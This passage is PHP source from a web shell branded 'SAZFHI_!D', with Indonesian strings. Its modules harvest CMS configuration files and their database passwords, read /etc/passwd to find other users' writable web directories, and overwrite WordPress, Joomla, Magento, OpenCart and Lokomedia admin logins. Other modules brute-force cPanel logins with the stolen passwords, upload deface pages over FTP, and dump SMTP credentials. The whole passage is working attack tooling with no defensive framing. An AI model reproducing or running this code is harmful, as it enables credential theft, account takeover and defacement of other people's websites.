  972.                             "$user_config_dir/sites/default/settings.php" => "Drupal",
  973.                             "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  974.                             "$user_config_dir/app/etc/local.xml" => "Magento",
  975.                             "$user_config_dir/joomla/configuration.php" => "Joomla",
  976.                             "$user_config_dir/configuration.php" => "Joomla",
  977.                             "$user_config_dir/wp/wp-config.php" => "WordPress",
  978.                             "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  979.                             "$user_config_dir/wp-config.php" => "WordPress",
  980.                             "$user_config_dir/admin/config.php" => "OpenCart",
  981.                             "$user_config_dir/slconfig.php" => "Sitelok",
  982.                             "$user_config_dir/application/config/database.php" => "Ellislab");
  983.                         foreach($grab_config as $config => $nama_config) {
  984.                             $ambil_config = file_get_contents($config);
  985.                             if($ambil_config == '') {
  986.                             } else {
  987.                                 $file_config = fopen("sazfhi_config/$user_idx-$nama_config.txt","w");
  988.                                 fputs($file_config,$ambil_config);
  989.                             }
  990.                         }
  991.                     }      
  992.                 }
  993.             }  
  994.         }
  995.     echo "<center><a href='?dir=$dir/sazfhi_config'><font color=lime>Done</font></a></center>";
  996.     }
  997. } elseif($_GET['do'] == 'jumping') {
  998.     $i = 0;
  999.     echo "<div class='margin: 5px auto;'>";
  1000.     if(preg_match("/hsphere/", $dir)) {
  1001.         $urls = explode("\r\n", $_POST['url']);
  1002.         if(isset($_POST['jump'])) {
  1003.             echo "<pre>";
  1004.             foreach($urls as $url) {
  1005.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1006.                 $etc = "/etc/passwd";
  1007.                 $f = fopen($etc,"r");
  1008.                 while($gets = fgets($f)) {
  1009.                     $pecah = explode(":", $gets);
  1010.                     $user = $pecah[0];
  1011.                     $dir_user = "/hsphere/local/home/$user";
  1012.                     if(is_dir($dir_user) === true) {
  1013.                         $url_user = $dir_user."/".$url;
  1014.                         if(is_readable($url_user)) {
  1015.                             $i++;
  1016.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1017.                             if(is_writable($url_user)) {
  1018.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1019.                             }
  1020.                             echo $jrw."<br>";
  1021.                         }
  1022.                     }
  1023.                 }
  1024.             }
  1025.         if($i == 0) {
  1026.         } else {
  1027.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1028.         }
  1029.         echo "</pre>";
  1030.         } else {
  1031.             echo '<center>
  1032.                   <form method="post">
  1033.                   List Domains: <br>
  1034.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1035.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1036.             while($getss = fgets($fp)) {
  1037.                 echo $getss;
  1038.             }
  1039.             echo  '</textarea><br>
  1040.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1041.                   </form></center>';
  1042.         }
  1043.     } elseif(preg_match("/vhosts|vhost/", $dir)) {
  1044.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  1045.         $urls = explode("\r\n", $_POST['url']);
  1046.         if(isset($_POST['jump'])) {
  1047.             echo "<pre>";
  1048.             foreach($urls as $url) {
  1049.                 $url = str_replace("www.", "", $url);
  1050.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  1051.                 if(is_dir($web_vh) === true) {
  1052.                     if(is_readable($web_vh)) {
  1053.                         $i++;
  1054.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1055.                         if(is_writable($web_vh)) {
  1056.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1057.                         }
  1058.                         echo $jrw."<br>";
  1059.                     }
  1060.                 }
  1061.             }
  1062.         if($i == 0) {
  1063.         } else {
  1064.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1065.         }
  1066.         echo "</pre>";
  1067.         } else {
  1068.             echo '<center>
  1069.                   <form method="post">
  1070.                   List Domains: <br>
  1071.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1072.                   bing("ip:$ip");
  1073.             echo  '</textarea><br>
  1074.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1075.                   </form></center>';
  1076.         }
  1077.     } else {
  1078.         echo "<pre>";
  1079.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1080.         while($passwd = fgets($etc)) {
  1081.             if($passwd == '' || !$etc) {
  1082.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1083.             } else {
  1084.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1085.                 foreach($user_jumping[1] as $user_idx_jump) {
  1086.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1087.                     if(is_readable($user_jumping_dir)) {
  1088.                         $i++;
  1089.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1090.                         if(is_writable($user_jumping_dir)) {
  1091.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1092.                         }
  1093.                         echo $jrw;
  1094.                         if(function_exists('posix_getpwuid')) {
  1095.                             $domain_jump = file_get_contents("/etc/named.conf");   
  1096.                             if($domain_jump == '') {
  1097.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1098.                             } else {
  1099.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1100.                                 foreach($domains_jump[1] as $dj) {
  1101.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1102.                                     $user_jumping_url = $user_jumping_url['name'];
  1103.                                     if($user_jumping_url == $user_idx_jump) {
  1104.                                         echo " => ( <u>$dj</u> )<br>";
  1105.                                         break;
  1106.                                     }
  1107.                                 }
  1108.                             }
  1109.                         } else {
  1110.                             echo "<br>";
  1111.                         }
  1112.                     }
  1113.                 }
  1114.             }
  1115.         }
  1116.         if($i == 0) {
  1117.         } else {
  1118.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1119.         }
  1120.         echo "</pre>";
  1121.     }
  1122.     echo "</div>";
  1123. } elseif($_GET['do'] == 'auto_edit_user') {
  1124.     if($_POST['hajar']) {
  1125.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1126.             echo "username atau password harus lebih dari 6 karakter";
  1127.         } else {
  1128.             $user_baru = $_POST['user_baru'];
  1129.             $pass_baru = md5($_POST['pass_baru']);
  1130.             $conf = $_POST['config_dir'];
  1131.             $scan_conf = scandir($conf);
  1132.             foreach($scan_conf as $file_conf) {
  1133.                 if(!is_file("$conf/$file_conf")) continue;
  1134.                 $config = file_get_contents("$conf/$file_conf");
  1135.                 if(preg_match("/JConfig|joomla/",$config)) {
  1136.                     $dbhost = ambilkata($config,"host = '","'");
  1137.                     $dbuser = ambilkata($config,"user = '","'");
  1138.                     $dbpass = ambilkata($config,"password = '","'");
  1139.                     $dbname = ambilkata($config,"db = '","'");
  1140.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1141.                     $prefix = $dbprefix."users";
  1142.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1143.                     $db = mysql_select_db($dbname);
  1144.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1145.                     $result = mysql_fetch_array($q);
  1146.                     $id = $result['id'];
  1147.                     $site = ambilkata($config,"sitename = '","'");
  1148.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1149.                     echo "Config => ".$file_conf."<br>";
  1150.                     echo "CMS => Joomla<br>";
  1151.                     if($site == '') {
  1152.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1153.                     } else {
  1154.                         echo "Sitename => $site<br>";
  1155.                     }
  1156.                     if(!$update OR !$conn OR !$db) {
  1157.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1158.                     } else {
  1159.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1160.                     }
  1161.                     mysql_close($conn);
  1162.                 } elseif(preg_match("/WordPress/",$config)) {
  1163.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1164.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1165.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1166.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1167.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1168.                     $prefix = $dbprefix."users";
  1169.                     $option = $dbprefix."options";
  1170.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1171.                     $db = mysql_select_db($dbname);
  1172.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1173.                     $result = mysql_fetch_array($q);
  1174.                     $id = $result[ID];
  1175.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1176.                     $result2 = mysql_fetch_array($q2);
  1177.                     $target = $result2[option_value];
  1178.                     if($target == '') {
  1179.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1180.                     } else {
  1181.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1182.                     }
  1183.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1184.                     echo "Config => ".$file_conf."<br>";
  1185.                     echo "CMS => Wordpress<br>";
  1186.                     echo $url_target;
  1187.                     if(!$update OR !$conn OR !$db) {
  1188.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1189.                     } else {
  1190.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1191.                     }
  1192.                     mysql_close($conn);
  1193.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1194.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1195.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1196.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1197.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1198.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1199.                     $prefix = $dbprefix."admin_user";
  1200.                     $option = $dbprefix."core_config_data";
  1201.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1202.                     $db = mysql_select_db($dbname);
  1203.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1204.                     $result = mysql_fetch_array($q);
  1205.                     $id = $result[user_id];
  1206.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1207.                     $result2 = mysql_fetch_array($q2);
  1208.                     $target = $result2[value];
  1209.                     if($target == '') {
  1210.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1211.                     } else {
  1212.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1213.                     }
  1214.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1215.                     echo "Config => ".$file_conf."<br>";
  1216.                     echo "CMS => Magento<br>";
  1217.                     echo $url_target;
  1218.                     if(!$update OR !$conn OR !$db) {
  1219.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1220.                     } else {
  1221.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1222.                     }
  1223.                     mysql_close($conn);
  1224.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1225.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1226.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1227.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1228.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1229.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1230.                     $prefix = $dbprefix."user";
  1231.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1232.                     $db = mysql_select_db($dbname);
  1233.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1234.                     $result = mysql_fetch_array($q);
  1235.                     $id = $result[user_id];
  1236.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1237.                     if($target == '') {
  1238.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1239.                     } else {
  1240.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1241.                     }
  1242.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1243.                     echo "Config => ".$file_conf."<br>";
  1244.                     echo "CMS => OpenCart<br>";
  1245.                     echo $url_target;
  1246.                     if(!$update OR !$conn OR !$db) {
  1247.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1248.                     } else {
  1249.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1250.                     }
  1251.                     mysql_close($conn);
  1252.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1253.                     $dbhost = ambilkata($config,'server = "','"');
  1254.                     $dbuser = ambilkata($config,'username = "','"');
  1255.                     $dbpass = ambilkata($config,'password = "','"');
  1256.                     $dbname = ambilkata($config,'database = "','"');
  1257.                     $prefix = "users";
  1258.                     $option = "identitas";
  1259.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1260.                     $db = mysql_select_db($dbname);
  1261.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1262.                     $result = mysql_fetch_array($q);
  1263.                     $target = $result[alamat_website];
  1264.                     if($target == '') {
  1265.                         $target2 = $result[url];
  1266.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1267.                         if($target2 == '') {
  1268.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1269.                         } else {
  1270.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1271.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1272.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1273.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1274.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1275.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1276.                             } else {
  1277.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1278.                             }
  1279.                         }
  1280.                     } else {
  1281.                         $cek_login = file_get_contents("$target/adminweb/");
  1282.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1283.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1284.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1285.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1286.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1287.                         } else {
  1288.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1289.                         }
  1290.                     }
  1291.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1292.                     echo "Config => ".$file_conf."<br>";
  1293.                     echo "CMS => Lokomedia<br>";
  1294.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1295.                         echo $url_target2;
  1296.                     } else {
  1297.                         echo $url_target;
  1298.                     }
  1299.                     if(!$update OR !$conn OR !$db) {
  1300.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1301.                     } else {
  1302.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1303.                     }
  1304.                     mysql_close($conn);
  1305.                 }
  1306.             }
  1307.         }
  1308.     } else {
  1309.         echo "<center>
  1310.         <h1>Auto Edit User Config</h1>
  1311.         <form method='post'>
  1312.         DIR Config: <br>
  1313.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1314.         Set User & Pass: <br>
  1315.         <input type='text' name='user_baru' value='SAZFHI_!D' placeholder='user_baru'><br>
  1316.         <input type='text' name='pass_baru' value='SAZFHI_!D' placeholder='pass_baru'><br>
  1317.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1318.         </form>
  1319.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1320.         ";
  1321.     }
  1322. } elseif($_GET['do'] == 'cpanel') {
  1323.     if($_POST['crack']) {
  1324.         $usercp = explode("\r\n", $_POST['user_cp']);
  1325.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1326.         $i = 0;
  1327.         foreach($usercp as $ucp) {
  1328.             foreach($passcp as $pcp) {
  1329.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1330.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1331.                     } else {
  1332.                         $_SESSION[$ucp] = "1";
  1333.                         $_SESSION[$pcp] = "1";
  1334.                         if($ucp == '' || $pcp == '') {
  1335.                            
  1336.                         } else {
  1337.                             $i++;
  1338.                             if(function_exists('posix_getpwuid')) {
  1339.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  1340.                                 if($domain_cp == '') {
  1341.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1342.                                 } else {
  1343.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1344.                                     foreach($domains_cp[1] as $dj) {
  1345.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1346.                                         $user_cp_url = $user_cp_url['name'];
  1347.                                         if($user_cp_url == $ucp) {
  1348.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1349.                                             break;
  1350.                                         }
  1351.                                     }
  1352.                                 }
  1353.                             } else {
  1354.                                 $dom = "<font color=red>function is Disable by system</font>";
  1355.                             }
  1356.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1357.                         }
  1358.                     }
  1359.                 }
  1360.             }
  1361.         }
  1362.         if($i == 0) {
  1363.         } else {
  1364.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>SAZFHI_!D.</font>";
  1365.         }
  1366.     } else {
  1367.         echo "<center>
  1368.         <form method='post'>
  1369.         USER: <br>
  1370.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1371.         $_usercp = fopen("/etc/passwd","r");
  1372.         while($getu = fgets($_usercp)) {
  1373.             if($getu == '' || !$_usercp) {
  1374.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1375.             } else {
  1376.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1377.                 foreach($u[1] as $user_cp) {
  1378.                         if(is_dir("/home/$user_cp/public_html")) {
  1379.                             echo "$user_cp\n";
  1380.                     }
  1381.                 }
  1382.             }
  1383.         }
  1384.         echo "</textarea><br>
  1385.         PASS: <br>
  1386.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1387.         function cp_pass($dir) {
  1388.             $pass = "";
  1389.             $dira = scandir($dir);
  1390.             foreach($dira as $dirb) {
  1391.                 if(!is_file("$dir/$dirb")) continue;
  1392.                 $ambil = file_get_contents("$dir/$dirb");
  1393.                 if(preg_match("/WordPress/", $ambil)) {
  1394.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1395.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1396.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1397.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1398.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1399.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1400.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1401.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1402.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1403.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  1404.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  1405.                     if(preg_match('/"/', $pass1[1])) {
  1406.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1407.                         $pass .= $pass1[1]."\n";
  1408.                     } else {
  1409.                         $pass .= $pass1[1]."\n";
  1410.                     }
  1411.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1412.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1413.                 }
  1414.             }
  1415.             echo $pass;
  1416.         }
  1417.         $cp_pass = cp_pass($dir);
  1418.         echo $cp_pass;
  1419.         echo "</textarea><br>
  1420.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1421.         </form>
  1422.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1423.     }
  1424. } elseif($_GET['do'] == 'cpftp_auto') {
  1425.     if($_POST['crack']) {
  1426.         $usercp = explode("\r\n", $_POST['user_cp']);
  1427.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1428.         $i = 0;
  1429.         foreach($usercp as $ucp) {
  1430.             foreach($passcp as $pcp) {
  1431.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1432.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1433.                     } else {
  1434.                         $_SESSION[$ucp] = "1";
  1435.                         $_SESSION[$pcp] = "1";
  1436.                         if($ucp == '' || $pcp == '') {
  1437.                             //
  1438.                         } else {
  1439.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1440.                             $ftp_conn = ftp_connect($ip);
  1441.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1442.                             if((!$ftp_login) || (!$ftp_conn)) {
  1443.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  1444.                             } else {
  1445.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  1446.                                 $fi = htmlspecialchars($_POST['file_deface']);
  1447.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1448.                                 if($deface) {
  1449.                                     $i++;
  1450.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  1451.                                     if(function_exists('posix_getpwuid')) {
  1452.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  1453.                                         if($domain_cp == '') {
  1454.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1455.                                         } else {
  1456.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1457.                                             foreach($domains_cp[1] as $dj) {
  1458.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1459.                                                 $user_cp_url = $user_cp_url['name'];
  1460.                                                 if($user_cp_url == $ucp) {
  1461.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1462.                                                     break;
  1463.                                                 }
  1464.                                             }
  1465.                                         }
  1466.                                     } else {
  1467.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1468.                                     }
  1469.                                 } else {
  1470.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1471.                                 }
  1472.                             }
  1473.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1474.                         }
  1475.                     }
  1476.                 }
  1477.             }
  1478.         }
  1479.         if($i == 0) {
  1480.         } else {
  1481.             echo "<br>sukses deface ".$i." Cpanel by <font color=lime>SAZFHI_!D.</font>";
  1482.         }
  1483.     } else {
  1484.         echo "<center>
  1485.         <form method='post'>
  1486.         Filename: <br>
  1487.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1488.         Deface Page: <br>
  1489.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1490.         USER: <br>
  1491.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1492.         $_usercp = fopen("/etc/passwd","r");
  1493.         while($getu = fgets($_usercp)) {
  1494.             if($getu == '' || !$_usercp) {
  1495.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1496.             } else {
  1497.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1498.                 foreach($u[1] as $user_cp) {
  1499.                         if(is_dir("/home/$user_cp/public_html")) {
  1500.                             echo "$user_cp\n";
  1501.                     }
  1502.                 }
  1503.             }
  1504.         }
  1505.         echo "</textarea><br>
  1506.         PASS: <br>
  1507.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1508.         function cp_pass($dir) {
  1509.             $pass = "";
  1510.             $dira = scandir($dir);
  1511.             foreach($dira as $dirb) {
  1512.                 if(!is_file("$dir/$dirb")) continue;
  1513.                 $ambil = file_get_contents("$dir/$dirb");
  1514.                 if(preg_match("/WordPress/", $ambil)) {
  1515.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1516.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1517.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1518.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1519.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1520.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1521.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1522.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1523.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1524.                 } elseif(preg_match("/client/", $ambil)) {
  1525.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1526.                     if(preg_match('/"/', $pass1[1])) {
  1527.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1528.                         $pass .= $pass1[1]."\n";
  1529.                     }
  1530.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1531.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1532.                 }
  1533.             }
  1534.             echo $pass;
  1535.         }
  1536.         $cp_pass = cp_pass($dir);
  1537.         echo $cp_pass;
  1538.         echo "</textarea><br>
  1539.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1540.         </form>
  1541.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1542.     }
  1543. } elseif($_GET['do'] == 'smtp') {
  1544.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1545.     function scj($dir) {
  1546.         $dira = scandir($dir);
  1547.         foreach($dira as $dirb) {
  1548.             if(!is_file("$dir/$dirb")) continue;
  1549.             $ambil = file_get_contents("$dir/$dirb");
  1550.             $ambil = str_replace("$", "", $ambil);
  1551.             if(preg_match("/JConfig|joomla/", $ambil)) {
  1552.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1553.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1554.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1555.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1556.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1557.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1558.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1559.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1560.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1561.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1562.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1563.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1564.             }
  1565.         }
  1566.     }
  1567.     $smpt_hunter = scj($dir);
  1568.     echo $smpt_hunter;
  1569. } elseif($_GET['do'] == 'auto_wp') {
  1570.     if($_POST['hajar']) {
  1571.         $title = htmlspecialchars($_POST['new_title']);
  1572.         $pn_title = str_replace(" ", "-", $title);
  1573.         if($_POST['cek_edit'] == "Y") {
  1574.             $script = $_POST['edit_content'];
  1575.         } else {
  1576.             $script = $title;
  1577.         }
  1578.         $conf = $_POST['config_dir'];
  1579.         $scan_conf = scandir($conf);
  1580.         foreach($scan_conf as $file_conf) {
  1581.             if(!is_file("$conf/$file_conf")) continue;
  1582.             $config = file_get_contents("$conf/$file_conf");
  1583.             if(preg_match("/WordPress/", $config)) {
  1584.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1585.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1586.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
